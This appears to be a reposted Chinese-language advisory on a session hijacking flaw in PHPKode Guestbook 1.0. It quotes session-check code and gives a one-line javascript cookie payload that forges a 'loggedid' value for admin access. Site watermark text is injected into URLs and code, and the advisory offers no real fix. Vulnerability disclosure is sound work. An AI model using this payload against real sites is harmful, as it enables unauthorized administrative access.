PHPKode Guestbook 1.0 Session Hijacking Vulnerability
--------------------------------------------------------- 作者: bd0rk
联系方式: bd0rk[at]hackermail测试数据 HdhCmsTest2cto测试数据
Greetz: Perle, Zubair Anjum, 1930-Team (Manu, Jenny, Manni & Conny)
测试平台 Ubuntu-Linux
影响软件版本: PHPKode Guestbook 1.0
软件开发者: http://HdhCmsTestphpkode测试数据
下载地址: http://HdhCmsTestphpkode测试数据/download/p/PHPKodeGuestbook_1.0.zip
«««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
kode_author.php页面缺陷代码分析:
@session_start();
function Logged() { if (isset($_SESSION['loggedid']) && isset($_SESSION['adminuser'])) { return TRUE; } else { return FALSE; } }
function get_visitor_key() { HdhCmsTest2cto测试数据 if (isset($_COOKIE["visitor_key"]) && !empty($_COOKIE["visitor_key"])) { $visitor_key = $_COOKIE["visitor_key"]; } else { $visitor_key = "None"; } return $visitor_key; }
«««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
测试方法:
javascript.document.cookie = "loggedid=YmFzdXJhYWFhMTp vc iAxPTFiYXJ1cmFhYWFhYQ==; path=/";
修复: 看上文分析
查看更多关于PHPKode Guestbook 1.0 Session劫持缺陷及修复 - 网站安全的详细内容...